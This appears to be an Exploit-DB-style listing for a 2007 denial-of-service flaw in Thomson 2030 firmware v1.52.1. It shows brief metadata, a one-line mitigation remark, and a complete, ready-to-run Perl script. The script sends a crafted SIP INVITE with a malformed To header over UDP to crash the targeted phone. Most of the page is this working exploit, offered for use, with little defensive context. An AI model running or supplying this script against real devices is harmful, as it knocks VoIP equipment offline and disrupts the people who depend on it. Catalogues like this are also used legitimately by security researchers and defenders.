header-logo
Suggest Exploit
vendor:
2030 firmware
by:
Unknown
7.5
CVSS
HIGH
DoS
400
CWE
Product Name: 2030 firmware
Affected Version From: Thomson 2030 firmware v1.52.1
Affected Version To: Thomson 2030 firmware v1.52.1
Patch Exists: NO
Related CWE:
CPE: o:thomson:2030_firmware:1.52.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

Thomson 2030 firmware v1.52.1 DoS Vulnerability

This exploit provokes a DoS in the Thomson 2030 firmware v1.52.1 device by sending a specially crafted SIP request.

Mitigation:

Apply a patch or update the firmware to a secure version.
Source

Exploit-DB raw data:

#!/usr/bin/perl

#Vulneravility for Thomson 2030 firmware v1.52.1

#It provokes a DoS in the device.

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);
 

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: <sip:tucu\@192.168.1.2>;tag=00\r\nTo: <A15+-97:=:\%0B>;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n";

$socket->send($msg);

# milw0rm.com [2007-08-27]